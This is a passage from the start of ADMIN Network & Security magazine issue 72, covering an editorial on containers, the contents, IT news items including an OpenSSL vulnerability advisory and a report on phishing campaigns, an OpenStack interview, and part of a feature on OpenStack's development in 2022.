You are on page 1of 102

ADMIN

Network & Security


Cybersecurity Maturity VPN with Git Versioned
Model Certification SoftEther Backups

Network & Security ISSUE 72

• Sensible deployments
• Small business alternatives
• What’s new in OpenStack?

Windows Subsystems
for Linux and Android

Parity Declustering RAID


Decrease resilvering times

Siege NetTools
Website stress and Simplified AD
benchmarking tool troubleshooting

Microsoft Purview Age


Data security in the Simple, secure
hybrid working world file encryption
DVD
R EE
WWW.ADMIN-MAGAZINE.COM
F
Welcome to ADMIN W E LCO M E

Container Angst
Just because it’s new, doesn’t mean it’s better. How I learned to stop worrying and love the old containers.

The IT world went container crazy a few years ago when Docker first hit the scene. Although I’m into
virtualization of all types, I totally missed out on Docker-mania. I never really “got” what all the hype was
about when containers had been around for about 40 years. There was never any excitement around them
until the whole Docker craze struck the hearts and minds of IT folk. I like containers. They’re easy to set up
and easy to manage, and there are lots of advantages of a lightweight but robust virtualization solution.
I’d been working with containers for years before Docker came along and spoiled it for everyone. Well, I
spoiled it for everyone who knew that containers weren’t new or spectacular in any way. It didn’t matter
how long containers had been around, these newfangled, fancier containers were somehow newer and
more exciting and something we’d never seen or heard of.
To the whole ridiculous whimsical container sickness, I say, “Bah. Humbug!” I love containers. Containers
aren’t the problem. It’s the madness surrounding them that irritates me. Other container technologies are
just as exciting as Docker containers. Podman, for example, is a great container technology from Red Hat.
Both technologies have their advantages and disadvantages.
I’m a fan of the old-school chroot jails, Solaris zones, and even the newer system container implementation,
system-nspawn. I like the simplicity of these “standard” container technologies. Attempting to create a cross-
platform, write-once-play-anywhere technology sounds great, but the problem for me is that I’m required
to install so much supporting software that it takes away the lightweight nature of the original idea. I don’t
necessarily think that every technology must be cross-platform capable. Some things should be operating
system-specific or at least operating system-optimized. For example, you can run an Apache web server,
PHP, and MySQL on Windows (WAMP), but when Linux is free, freely available, and LAMP (Linux, etc.) stacks
come prepackaged – even as container and virtual machine (VM) images, I’m not sure why one would go to
the trouble to create a WAMP stack (although I’ve done it).
I think a mixture of containers and full-featured VMs is the best solution. The Proxmox project offers this on
a single host system, which is a blending of the OpenVZ container technology and KVM/Qemu, as I recall. I’m
a huge fan of the OpenVZ container implementation. I can have a fully ready-to-run container host system
operable in about an hour that has the capability of hosting hundreds of container virtual machines.
Don’t get me wrong. I love new technology. More than once, I’ve shunned currently avail-
able technology for something much improved. And it only makes sense that not every new
solution will appeal to everyone. I like a new solution that is more efficient, cost-effective,
or labor-saving, or so clever that I can’t say anything bad about it. If a newfangled what-
ever isn’t in some way an improvement, then I’ll take a hard pass on it. I don’t need to
change what I’ve done for the past five years just because there’s a new thing avail-
able. Show me how it’s better, and I’ll buy in; otherwise, keep moving. This is
how I feel about certain container solutions mentioned above. They don’t seem
to improve on previous technology enough to go to the trouble of learning
or using them. If you use Docker or Podman, live long and prosper. You might
have the right temperament for them, but I don’t. My motto is that “Just be-
cause you can do something, doesn’t mean you should.” I can create concrete
furniture, but I don’t see the point of doing it, so I refrain.
I’m rarely an early adopter of the latest and greatest technology, not be-
cause I’m afraid of the technology but because of its vulnerabilities and
security holes. Avoiding unnecessary risk is my jam, and I’m sticking to
Image © Jakarin Niamkiang, 123RF.com

it for better or worse. Now, where are my hammer, chisel, and stone
tablets? Too bad there’s not a “Find my ancient tools” app available
somewhere. Now that’s something I could use. Perhaps a “pinch
zoom” on common household items with tiny writing is also
too tall an order. People would rather invent things we
don’t need than those we do.
Ken Hess • ADMIN Senior Editor

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 3
S E RV I C E Table of Contents

ADMIN Network & Security

Features Tools Security

10 OpenStack Interview 30 Git Versioned Backups 56 Age/Rage File Encryption


Developers Thierry Carrez and The open source Git tool from Age and Rage are the Go and
Jeremy Stanley talk about the developer world delivers Rust implementations of a
problems, innovations, and backups and version control. simple, modern, and secure file
future plans. encryption tool.
36 VPN with SoftEther
14 OpenStack News SoftEther is lean VPN software 58 WSL Vulnerabilities
The unprecedented hype that outpaces the current Several tactics, techniques, and
surrounding OpenStack 10 years king of the hill, OpenVPN, procedures circulating among
ago changed to disillusionment, in terms of technology and cybercriminals exploit Windows
which has nevertheless had a performance. Subsystem for Linux as a gateway.
positive effect: OpenStack is We look at how WSL can be
still evolving and is now mainly 40 Windows Subsystems misued and some appropriate
deployed where it actually makes WSL runs graphical Linux protections.
sense to do so. applications on Windows 11,
and WSA shows that Windows 62 Zeek
20 Sovereign Cloud Stack can be a platform for An arsenal of scripts for
Operators of OpenStack need to Android apps. monitoring popular network
know whether their environment protocols, along with its own
is working and quickly pinpoint policy scripting language for
problems. We look at the basics customization.
of observability in the Sovereign
Cloud Stack.

24 Container Issues Containers and Virtualization Management


As the major Linux
distributors increasingly lean 46 Siege Benchmarking Tool 64 NetTools for AD
toward containers, many A stress and benchmarking tool This set of utilities extracts
administrators have come to for websites controlled from the information from Active
realize that containers are by command line. Directory to help simplify
no means a panacea for all troubleshooting and
their problems. 50 OpenStack Alternatives administration.
OpenStack is considered the
industry standard for building 70 Samba AD Domain
private clouds, but the solution Controller
is still far too complex and too The open source Samba
difficult to maintain and operate service can act as an Active
for many applications. What Directory domain controller
causes OpenStack projects to in a heterogeneous
fail, and what alternatives do environment.
administrators have?

4 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Table of Contents S E RV I C E

10, 14, 20 | OpenStack


OpenStack 2022
Find out whether the much evolved
OpenStack is right for your private cloud.

Highlights

50 OpenStack 64 NetTools 76 Midmarket IAM


Alternatives This bouquet of utilities Identity access management is
If OpenStack is overkill for squeezes the last snippet expensive and more important
your company, you should of information out of than ever in small and mid-sized
consider a solution that Active Directory – and it's enterprises, so make sure you
brings together elements of fun to use! know how to evaluate products
open source software. and implement your solution.

Nuts and Bolts Nuts and Bolts On the DVD

76 Midmarket IAM 88 Analyzing Logs in HPC Fedora is the upstream source for Red
Identity and access Log analysis can be used to Hat Enterprise Linux and is based on
management in midmarket great effect in HPC systems. the latest server technology to provide
organizations. We present an overview of
a “stable, flexible, and universally ad-
the current log analysis
80 CMMC technologies. aptable basis for the everyday provisi-
The US Cybersecurity Maturity on of digital services and information.”
Model Certification will be 93 Performance Dojo Fedora 36 Server changes include an
required by mid-2023 to Sensor tools provide highly updated Ansible 5 and Podman 4.0, and
handle controlled unclassified variable data from a variety
the RPM database has been moved
information and win federal of sources. We look at some
contracts, but it can also help tools to verify the temperature from /var to /usr. For more information
minimize business risk and keep of components on diverse on Fedora 36 Server, go to https://docs.
information out of the hands of hardware. fedoraproject.org/fedora-server/.
adversaries.

84 Declustered Parity
dRAID decreases resilvering
times, restoring a pool to full
redundancy in a fraction of
the time over the traditional
RAIDz. Service
3 Welcome
6 News
97 Back Issues
98 Call for Papers

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 5
NEWS ADMIN News

News for Admins

Tech News
OpenSSL 3.0.7 Patches Serious Vulnerabilities
OpenSSL has issued an advisory (https://www.openssl.org/news/secadv/20221101.txt) relating to two
vulnerabilities (CVE-2022-3602 and CVE-2022-3786), which affect OpenSSL version 3.0.0.
These vulnerabilities have been addressed with the release of OpenSSL 3.0.7, so users should
update now.
“Users of OpenSSL 3.0.0–3.0.6 are encouraged to upgrade to 3.0.7 as soon as possible. If you
obtain your copy of OpenSSL from your operating system vendor or other third party then you
should seek to obtain an updated version from them as soon as possible,” the OpenSSL team
says (https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/).
In a previous announcement (https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.
html), these vulnerabilities were described as “critical” — possibly leading to remote code execu-
tion. However, the OpenSSL project team has since downgraded the threats to “high,” saying they
“are not aware of any working exploit that could lead to remote code execution” and have no evi-
dence of the vulnerabilities being exploited at this time.

IBM Introduces Diamondback Tape Library


IBM recently introduced the Diamondback Tape Library, “a high-density archival storage solution
that is physically air-gapped to help protect against ransomware and other cyber threats in hybrid
cloud environments.”
The Diamondback Tape Library (https://www.ibm.com/products/diamondback-tape-library) is aimed at or-
ganizations that need to secure hundreds of petabytes of data, such as hyperscale cloud providers
and global enterprises aggregating massive data sets, according to the announcement (https://www.
hpcwire.com/off-the-wire/ibm-releases-its-diamondback-tape-library/). “It provides long-term storage and is
designed to provide a significantly smaller carbon footprint compared to flash or disk storage, and
with a lower total cost of ownership.”
The main benefits of IBM Diamondback, the announcement says, include:
Get the latest
IT and HPC news • Sustainability
Lead Image © vlastas, 123RF.com

in your inbox • Ransomware protection and cyber resiliency


• Data capacity and storage costs
Subscribe free to
ADMIN Update “The IBM Diamondback Tape Library provides critical protection against a variety of threats, help-
and HPC Update ing minimize data center floor space requirements and organizations’ carbon footprint[s],” says
bit.ly/HPC-ADMIN-Update Scott Baker, Vice President and Chief Marketing Officer of IBM Storage.

6 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
NEWS ADMIN News

PostgreSQL 15 Released
The PostgreSQL Global Development Group has released version 15 of the open source PostgreSQL
(https://www.postgresql.org/) database.
PostgreSQL 15 now also includes the SQL standard MERGE (https://www.postgresql.org/docs/15/sql-
merge.html) command, which “lets you write conditional SQL statements that can include INSERT,
UPDATE, and DELETE actions within a single statement.”
According to the announcement, PostgreSQL 15 also includes performance improvements
“with noticeable gains for managing workloads in both local and distributed deployments, in-
cluding improved sorting.” Specifically, PostgreSQL 15 offers improved in-memory and on-disk
sorting (https://www.postgresql.org/docs/15/queries-order.html) algorithms, with benchmarks showing
increases of 25–400 percent depending on data type.
“The PostgreSQL developer community continues to build features that simplify running high
performance data workloads while improving the developer experience,” said Jonathan Katz, a
PostgreSQL Core Team member.

Hackers Weaponize Open Source Software in Targeted Phishing Attempts


The Microsoft Threat Intelligence Center (MSTIC) has recently detected a wide range of phishing
attempts using weaponized open source software.
These attempts, attributed to ZINC (https://www.microsoft.com/security/blog/2021/01/28/zinc-at-
tacks-against-security-researchers/), have used traditional social engineering tactics by contacting
individuals with fake job offers on LinkedIn. “Upon successful connection, ZINC encouraged
continued communication over WhatsApp, which acted as the means of delivery for their mali-
cious payloads,” Microsoft says (https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-
open-source-software/).
MSTIC has observed ZINC, also known as Lazarus, using weaponized versions of open source
software including PuTTY, KiTTY, and TightVNC installer for these attacks, which have targeted
“employees in organizations across multiple industries including media, defense and aerospace,
and IT services in the US, UK, India, and Russia.”

Linux Kernel 6.0 Announced


Linus Torvalds has released Linux kernel 6.0 (https://lwn.net/Articles/910086/), noting that the version
number change is more a matter of practicality than reflective of any fundamental changes.
“But of course there’s a lot of various changes in 6.0,” Torvalds says, “We’ve got over 15k non-
merge commits in there in total, after all, and as such 6.0 is one of the bigger releases at least in
numbers of commits in a while.”
According to Jon Corbet at LWN.net, “headline features of this latest release include a number of
io_uring improvements, including support for buffered writes to XFS filesystems and zero-copy net-
work transmission, an io_uring-based block driver mechanism, the runtime verification subsystem,
and much more.”
See change details in LWN’s merge-window summaries (part 1 [https://lwn.net/Articles/903487/]
and part 2 [https://lwn.net/Articles/904032/]) and read more at LWN.net (https://lwn.net/Arti-
cles/910086/).

Google Announces TensorStore for High-Performance Array Storage


Google has announced TensorStore, an open source, C++ and Python library designed for reading
and writing large multi-dimensional arrays.
Many contemporary computer science applications manipulate huge, multi-dimensional datasets,
says Google. “In these settings, even a single dataset may require terabytes or petabytes of data
storage. Such datasets are also challenging to work with as users may read and write data at irreg-
ular intervals and varying scales, and are often interested in performing analyses using numerous
machines working in parallel,” Google explains.
TensorStore is an open source software library that, according to the website (https://google.github.
io/tensorstore/#concepts):

8 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
ADMIN News NEWS

• Provides a uniform API for reading and writing multiple array formats
• Natively supports multiple storage drivers, including Google Cloud Storage, local and network
filesystems, in-memory storage
• Automatically takes advantage of multiple cores for encoding/decoding and performs multiple
concurrent I/O operations to saturate network bandwidth
• Enables high-throughput access even to high-latency remote storage

“Processing and analyzing large numerical datasets requires significant computational resources,”
says Google, which “is typically achieved through parallelization across numerous CPU or accelera-
tor cores spread across many machines.” Thus, according to Google, “a fundamental goal of Ten-
sorStore has been to enable parallel processing of individual datasets that is both safe (i.e., avoids
corruption or inconsistencies arising from parallel access patterns) and high performance (i.e.,
reading and writing to TensorStore is not a bottleneck during computation).”

NIST and Google Partner to Develop Open Source Chips


Google and the National Institute of Standards and Technology (NIST) have signed a research and
development agreement (https://www.commerce.gov/news/press-releases/2022/09/nist-and-google-create-new-
supply-chips-researchers-and-tech-startups) for production of open source chips.
The chips will be manufactured by SkyWater Technology in Minnesota, according to the an-
nouncement. “Google will pay the initial cost of setting up production and will subsidize the first
production run. NIST, with university research partners, will design the circuitry for the chips.
The circuit designs will be open source, allowing academic and small business researchers to use
the chips without restriction or licensing fees.” As many as 40 different chip designs are planned,
which will be optimized for different applications.
“The SkyWater foundry will produce the chips in the form of 200-mm discs of patterned silicon,
called wafers,” the announcement says, and the first production run will be distributed to leading
US universities. “Giving researchers access to chips in this format will allow them to prototype de-
signs and emerging technologies that, if successful, can be integrated into production more quickly,
thus speeding the transfer of technology from lab to market.”
“By creating a new and affordable domestic supply of chips for research and development, this col-
laboration aims to unleash the innovative potential of researchers and startups across the nation,” says
Under Secretary of Commerce for Standards and Technology and NIST Director Laurie E. Locascio.

Security and Compliance Drive Adoption of Observability Practices


New Relic’s 2022 Observability Forecast (https://newrelic.com/observability-forecast/2022/about-this-report)
surveyed tech professionals across 14 countries to better understand their use and adoption of ob-
servability tools and approaches.
In regard to what is driving adoption of observability practices, the top response was an in-
creased focus on security, governance, risk, and compliance (49%). Other factors included:

• Development of cloud-native application architectures (46%)


• Increased focus on customer experience management (44%)
• Migration to multi-cloud environment (42%)
• Adoption of open source technologies (39%)

The survey also asked whether practitioners viewed observability as more of an enabler for achiev-
ing business goals or more for incident response, with the following results:

• Observability was completely or generally for achieving core business goals (50%)
• Observability was equally for business goals and incident response (28%)
• Observability was more for incident response/insurance (21%)

The survey also found that “IT operations teams were most likely to be responsible for observabil-
ity followed by network operations and DevOps teams.”

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 9
F E AT U R E OpenStack Interview

Questions about the present and future of OpenStack

Maturity Processes
OpenStack has been on the market for 12 years and is generally considered one of the great open source
projects. Thierry Carrez and Jeremy Stanley both work on the software and provide information about
problems, innovations, and future plans. By Ulrich Bantle

ADMIN Magazine: The OpenStack Thierry Carrez: The foundation was cloud infrastructure services, be it
Foundation has changed its name to originally created to host and promote to offer private resources for a given
the OpenInfra Foundation. Can you say the OpenStack project. In the pro- organization or public resources for
something about the part OpenStack cess of doing so in the last 10 years, customers around the world with a
plays in this new setting? we assembled a wide community of credit card. Combined with the Linux
operators, organizations, and develop- kernel and Kubernetes for application
ers interested in the concept of using orchestration, it forms a very popular
open source solutions to provide in- open source framework, the Linux
frastructure. With such an audience, OpenStack Kubernetes Infrastructure
it is only natural that we support and (LOKI). Usage is growing signifi-
host other projects that are relevant cantly, driven by new requirements
for the same audience. and new practices.
This is why we became the Open- That said, OpenStack is functionally
Infra Foundation: to support other mature and its scope now well de-
open infrastructure projects beyond fined, so I expect new development to
OpenStack that are of interest to the slow down and focus on maintenance
group of infrastructure providers we going forward. In the same way Linux
assembled. OpenStack is still by far kernel development is driven by new
the largest project hosted at the Foun- capabilities in computer hardware, I
dation, though, so it is central to all of expect OpenStack development also
our activities. With the change and the to be driven by new capabilities in
new project hosting offering we pre- data center hardware needing to be
sented at the 2018 Summit in Berlin, made available to the software.
we are ready to tackle the next decade
Thierry Carrez, General Manager at the Open- of open infrastructure projects. AM: OpenStack is still a very success-
Infra Foundation, was involved in founding the ful project with big numbers, but some
Photo by Julien DI MAJO on Unsplash

OpenStack project as a systems engineer and AM: OpenStack celebrates its 12th an- critics say the growth in installations
still contributes to its governance and release niversary this year. Where do you see belongs more to existing customers
management. A fellow of the Python Software it in the coming years, and what will than to new customers. Is that right?
Foundation, he previously worked as technical change?
lead for Ubuntu Server at Canonical, operations TC: It’s really both. In June we held
lead for the Gentoo Linux Security team, and IT TC: Today, OpenStack is the de facto our first in-person event since the
manager at various companies. open source standard for deploying pandemic, the OpenInfra Summit in

10 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
OpenStack Interview F E AT U R E

Berlin [1]. We met one new user after hyperscalers can’t provide a good of the perceived complexity is really a
another, many of them running at solution. In those strategies, private result of people mistakenly installing
impressive scale surpassing 100,000 OpenStack clouds are often used more than they actually need.
cores of compute on OpenStack. New in combination with AWS, Azure,
requirements like digital sovereignty Google, or one of the many Open- AM: Any plans to make the upgrading
are driving a lot of adoption, espe- Stack-based public clouds in a multi- process less complex and with less
cially in scientific use cases and the cloud or hybrid cloud deployment. downtime?
public cloud in Europe. The need to That said, the main difference be-
deploy new municipal and research tween OpenStack and proprietary TC::At this point, upgrading an Open-
systems rapidly for pandemic re- clouds is the ability to participate Stack cluster is a pretty established
sponse also resulted in a lot of addi- in an open, active community and process, and it does not trigger sig-
tional deployments worldwide. Exist- directly influence the direction of the nificant downtime. At the same time,
ing implementations keep growing, as project through personal involvement. the size of deployments has grown
well. It’s a healthy balance of energy That’s something proprietary solu- significantly, with some now well sur-
and creativity for the community. tions will never match. passing the million-core CPU mark.
That represents a lot of OpenStack
AM: When you take a look at possible AM: Companies are desperately look- clusters, so keeping them up to date
competitors, why should users choose ing for developers and IT experts. with a release every six months is still
OpenStack and not AWS? What are the What steps are planned to make Open- significant work.
main differences? Stack easier to use to mitigate this To reduce the pressure to upgrade
staff shortage? for established deployments, start-
TC: Users should always choose the ing with the OpenStack “Antelope”
solution that is the best for their spe- Jeremy Stanley: It’s funny: Every release in March 2023, OpenStack
cific needs. There are many reasons time I hear someone talk about how is offering the possibility to directly
why someone would choose one, the hard OpenStack is to deploy and man- upgrade yearly instead of every six
other, or both. Our community tells age, they inevitably have not touched months. This should hopefully facili-
us that they see OpenStack playing it for years. The community has made tate the lives of OpenStack operators.
an important role to control their operations a major point for new
infrastructure costs, or to fulfill their capabilities, and while infrastructure AM: Can you describe the modular ar-
regulatory requirements, or to answer will always be hard, the stereotypical chitecture of OpenStack?
very specific use cases for which challenges to deploying and operating
OpenStack are no longer issues. JS: The fundamental design principle
across OpenStack projects is that ser-
AM: In detail, are there any plans re- vices interact with each other through
garding the development of OpenStack REST (i.e., HTTP-based) interfaces
to make deployment less complicated? to coordinate shared resources.
Services are written in a consistent
JS: In recent years, the community programming language and coding
has put a lot of energy into support- style, avoiding significant duplication
ing installations for a variety of popu- through central libraries and consen-
lar configuration management and sus around dependencies. The result
orchestration solutions like Ansible, is a pluggable suite of service options
Chef, Helm, and Puppet, as well as that organizations can tailor to their
focusing on both packaging for server particular use cases by installing just
distributions and container-based what they need, while still having the
frameworks like Kubernetes. opportunity to grow their solution by
adding other services as their require-
AM: What do you think could make ments change.
the installation more simple?
Jeremy Stanley has worked as a Unix and AM: What should change in terms of
Linux sys admin for more than two decades, JS: Many new users don’t realize the OpenStack architecture to make
focusing on information security, Internet that OpenStack isn’t an all-or-nothing management easier?
services, and data center automation. He is solution. It’s a composable, modular
a core member of the OpenStack project’s suite of services, most of which are JS: A significant undertaking, al-
infrastructure team, serving on both the optional, and some can even be used ready well underway, is the imple-
technical committee and the vulnerability entirely on their own. We’re working mentation of an extensible role-based
management team. to amplify this message, because a lot access control model. With this,

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 11
F E AT U R E OpenStack Interview

operators will be able to delegate likely to need and how best to design the networking data plane for very
permissions for some tasks to other the deployment to maximize effi- large scale clouds or clouds with high
users, reducing their own workload. ciency and minimize cost. network throughput demands. Local
Consumers of the cloud resources IP is a virtual IP that can be shared
will likewise gain the ability to pro- AM: Maybe you could give a special across multiple ports or VMs, is only
vide fine-grained control of specific view on the “Yoga” release and how it reachable within the same physical
actions to relevant stakeholders in helps make things easier. server or node boundaries, and is
their organizations. This work is still optimized for such performance use
in its early stages, with the introduc- JS: It’s hard to single out a few fea- cases.
tion of support for a read-only role to tures, but one good example is that
allow access to audit systems with- Ironic [for provisioning bare metal LM: You gave a talk at the OpenInfra
out the risk that the user might make machines] continued to evolve its Summit to collect scaling stories. Can
changes; the ability to create more defaults to align with more modern you give a short overview of what
specific roles will follow in coming server infrastructures, switching from users reported there and what the
releases. legacy BIOS to UEFI and emphasiz- problems in scaling could be?
ing local boot workflows for deployed
AM: What do you think are the key de- images. Another is Kolla [production- TC: It was a standing room only
ployment challenges that organiza- ready containers and deployment session, and it was great to see op-
tions face with OpenStack? tools], which focused on a single set erators of large deployments at Ubi-
of container images, rather than trying soft, Bloomberg, OVHcloud, CERN,
JS: The hardest challenges, by far, to maintain two different solutions in Workday, or Adevinta share their
are related to planning and sizing parallel, and simplified its design with experiences and pain points. They
infrastructure. No two use cases are the addition of a new Ansible collec- primarily discussed two classic scal-
the same, and especially with added tion that shared across its components. ing pain points in large OpenStack
complications in obtaining hardware Additionally, Nova added support for clusters: RabbitMQ and Neutron. In
these days, it’s more important than offloading the network control plane particular, they traded tips on how
ever to be as accurate as possible to a SmartNIC, freeing up more capac- best to monitor and alleviate load
and not overspend. Unfortunately, ity for hypervisor workloads, and can issues.
sizing a deployment (of anything also now provide processor architec- This discussion was driven by the op-
beyond trivial complexity, not just ture emulation for users who want erators themselves within the Open-
OpenStack) is more of an art than a to run software built for ARM, MIPS, Stack Large Scale SIG and is a great
science. If your haven’t done it often PowerPC, or S/390 systems, all on the example of what open communities
and for a wide variety of solutions, same host. can achieve working together – some-
it’s hard to even know where to be- thing that is only truly possible with
gin. That’s really one of the biggest AM: Yoga Neutron has a new feature open source software. Q
reasons to establish a relationship called Local IP. Can you explain the
with an OpenStack distribution ven- benefits in performance?
dor: They have more experience than Info
anyone else at estimating how much TC: Local IP is primarily focused on [1] OpenInfra Summit Berlin: [https://www.
of what sort of hardware you’re high efficiency and performance of youtube.com/hashtag/openinfrasummit]

12 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
F E AT U R E OpenStack News

The state of OpenStack in 2022

Hangover

The unprecedented hype surrounding OpenStack 10 years ago changed to disillusionment, which has
nevertheless had a positive effect: OpenStack is still evolving and is now mainly deployed where it actually
makes sense to do so. By Martin Loschwitz

In the middle of the past decade, it turned to Kubernetes, which was which makes sense in the US in par-
seemed that the leaders of the Open- about to become the next big thing. ticular for various reasons (e.g., a
Stack Foundation could hardly believe Following that, the media went quiet virtual-only project cannot hold any
the success of their product. For a about OpenStack. rights to trademarks or brands). On
long time, OpenStack trade fairs and, Some believe that OpenStack has top of that, someone had to pay for
above all, the OpenStack Summit disappeared from the scene, but – to the OpenStack party, and one of the
were surrounded by something like paraphrase Mark Twain – the news of Foundation’s core tasks is to raise
a mystical aura: 8,000 participants its demise is exaggerated. OpenStack sponsorship money. This task is done
and more regularly joined the private is still an active project today, albeit on a corporate and individual mem-
cloud computing environment camp with a much smaller community. bership basis, and the money is used
to catch up on the latest technology. However, it is still evolving, which is to fund the (fairly expensive) Open-
In 2012, an OpenStack sensation be- reason enough to take a fresh look Stack Summits (Figure 1), among
gan that the industry had never expe- at OpenStack and ask: What has other things.
rienced before, especially in the open changed technically, organizationally, At the height of the OpenStack hype
source software context. and administratively? cycle, the OpenStack Foundation
A big bang is inevitably followed by managed to gain significant influ-
a big hangover at some point, and OpenInfra ence with major vendors like VM-
Photo by vadim kaipov on Unsplash

OpenStack was no exception. Some ware, Intel, Red Hat, and others. As
participants even left the OpenStack The most noticeable innovation, OpenStack’s relevance waned, that
party while it was still in full swing. and one that has packed the biggest influence threatened to shrink again,
Large OpenStack projects sprang up punch, is the reorientation of the much to the displeasure of the folks
like mushrooms, fizzling out after OpenStack Foundation. Originally, at the Foundation. A few years ago,
months or years, and leaving little be- the Foundation had formed to give a course of reorientation was deter-
hind except frustrated people. Others OpenStack a non-commercial home, mined: The OpenStack Foundation

14 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
became the OpenInfra Foundation, the evergreens of the infrastructure open source projects, although the
and the OpenStack Summit became and open source theme: Zuul, for focus is on software that is somehow
the OpenInfra Summit. Ever since, example, the development suite that used in the infrastructure sector.
OpenStack has been a topic of inter- the Foundation uses to develop Open- The log manager, Loki (Figure 2),
est, but it is no longer the only sub- Stack, is now frequently used outside a lightweight alternative to the clas-
ject of interest to the Foundation. the project. As with OpenStack itself, sic Elasticsearch-Logstash-Kibana
In recent months, for example, the the Foundation is responsible for en- (ELK) stack, has now also slipped
Foundation has successively revised suring that the project does not disap- under the umbrella of the OpenInfra
many tools from OpenStack develop- pear without a trace. Foundation. Critics welcome this
ment, systematically placed them Additionally, the OpenInfra Founda- development because the apparent
under some kind of project man- tion has put out feelers in quite a few omnipotence of the Linux Foundation
agement, and published them. The other directions. Similar to the Linux had gradually become a problem for
topics tackled are something like Foundation, it offers an umbrella for many. However, it remains to be seen
whether the OpenInfra Foundation
will succeed in becoming a long-term
and powerful counterweight.

Technical Progress
The truism “you’re always smarter
in retrospect” fully applies to Open-
Stack. In terms of technology, many
of the teething troubles of the early
years are just now disappearing from
the environment. Several factors play
a role: Something recognizably good
for the project is the waning interest
of the major vendors.
Red Hat and Canonical are officially
committed to OpenStack to this day,
but SUSE, an OpenStack pioneer,
has largely abandoned OpenStack
development and pulled the plug
on its own OpenStack distribution,
Figure 1: OpenStack Summit 2022 in Berlin, live again for the first time since the emergence SUSE Cloud. Accordingly, there is
of COVID-19, is still a reunion of sorts, albeit a much smaller one. © OpenInfra Foundation little coming out of those quarters

Figure 2: Loki is a lightweight alternative to the ELK stack and is now one of the OpenInfra Foundation projects. © Loki

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 15
F E AT U R E OpenStack News

in terms of OpenStack source code In pioneering days, the industry had The Big Six
at the moment. However, it is ap- high expectations that each new
parent that the large number of OpenStack version had to light a bon- Most of the changes are found in the
companies that wanted to influence fire full of features with groundbreak- six core platform components that
OpenStack, especially in the initial ing innovations. Currently, Open- together form an OpenStack instance.
phase of the project, was probably Stack is developing at a far slower For example, the storage manager
more of a curse than a blessing. A pace. Although OpenStack releases Cinder can now overwrite a virtual
good example of this is provided by do still include thousands of commits volume with the contents of a hard
Cinder, the OpenStack component and a very long changelog, today drive image. Until now, this was only
that manages storage. When indus- the release highlights (i.e., the most possible during virtual machine (VM)
try leaders argue about architecture important and profound changes in creation. Now, however, existing VMs
decisions on the Cinder mailing list, an OpenStack release) tend to fit on can be re-created without deleting
the only way out is always the low- a few screen pages, mostly because and re-creating the entire VM or disk
est common denominator. Now that new OpenStack versions no longer (reimaging).
fewer major players are involved, come with new components that no Moreover, Cinder now has support for
developers have occasionally dared one has heard of before and then new hardware back ends. In the fu-
to make major changes and features disappear into a black hole again two ture, it will be able to use Fibre Chan-
that break with old compatibility releases later. nel to address its storage in the form
defaults. The last major OpenStack release of LightOS over NVMe by TCP, just
On top of that, the OpenInfra Foun- (“Yoga,” numbered 25) came out like Netstor devices from Toyou. NEC
dation has now found a stable work at the end of March. A look at its V series storage will also support both
approach to help manage the indi- release highlights underscores the Fibre Channel and iSCSI in the future.
vidual OpenStack components and fact that OpenStack is now more The Glance image service has always
their development in a meaning- cautious than it was a few years been one of the components with
ful way. To date, each component ago. OpenStack Blazar, for example, more relaxed development; conse-
has an engineering owner elected is a relatively new OpenStack quently, it offers little new. Quota
by the community from among its component that lets users reserve information about the stored images
members. The owner is responsible resources for themselves without can now be displayed; some new API
for the development content and is using them. This ability improves operations for editing metadata tags,
newly elected for each OpenStack reliability for applications that need for example, have been added; and
development cycle. guarantees in terms of resources there are more details about virtual
available and the extent of these images residing on RADOS block de-
Few Massive Changes resources at a certain point in time. vices (RBDs) in Ceph.
In OpenStack Yoga, Blazar can now
If you look at the present OpenStack store more details about individual Horizon, Nova, Keystone
changelog, you quickly notice that virtual instances so that the Open-
the individual components are now Stack Nova scheduler chooses the The Horizon graphical front end has
being developed more thoughtfully. hosts in a more targeted way. been massively overhauled by the

Figure 3: The developers have successively improved the theming options for the OpenStack dashboard. Horizon on Ubuntu appears today
in the typical Canonical orange. © Ubuntu

16 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
folks behind OpenStack over the past handled more efficiently – lifting the environment today. Accordingly, it is
two years and now supports transla- load off the host’s shoulders. important to the developers to opti-
tion to other languages and theming Previously, Nova could use NICs by mize OpenStack integration with Ku-
in a far better way. Canonical and selecting the appropriate driver for bernetes to the best possible extent.
Red Hat placed great emphasis on the emulator in use. Now, however, More recently, a number of compo-
this dashboard: After all, Canonical Nova has a setting on the back end nents have been added to OpenStack
Ubuntu wants to impress in orange for the virtual network card, so the for this purpose, including Kuryr.
(Figure 3), whereas Red Hat Open- feature has been standardized and Like OpenStack, Kubernetes is known
Stack accents its interface with red can theoretically be used by any net- to come with its own SDN implemen-
(Figure 4). Functionally, the dash- work back-end driver in Nova. tation. It used to be quite common
board in Horizon now has the abil- You can see how established Open- to run the virtualized Kubernetes
ity to create and delete quality of Stack thinks it has become by look- network on top of the OpenStack vir-
service (QoS) rules. ing for Keystone in the OpenStack tual network – much to the chagrin
The most important innovation in release highlights. The component is of many admins, because if anything
Yoga for the Nova virtualizer is the responsible for user and project man- went wrong in this layer cake, it was
ability to pass smart network in- agement and is therefore an abso- difficult or impossible to even guess
terface cards (SmartNICs) directly lutely essential feature; however, the the source of the problem.
through to a VM by way of network developers consider nothing in Yoga Kuryr remedies this conundrum by
back ends. Traditionally, a software- relevant enough to warrant a special creating virtual network ports in
defined network (SDN) in the Open- changelog entry. The developers OpenStack so that Kubernetes can
Stack context works by creating a themselves would probably not call use them natively and dispense with
virtual switch on the host that takes the Keystone feature complete, but its own SDN. This solution implicitly
care of packet delivery. However, the intent is to protect admins against enables several features that would
this approach to processing packets too many changes in Keystone in the otherwise go unused, such as the pre-
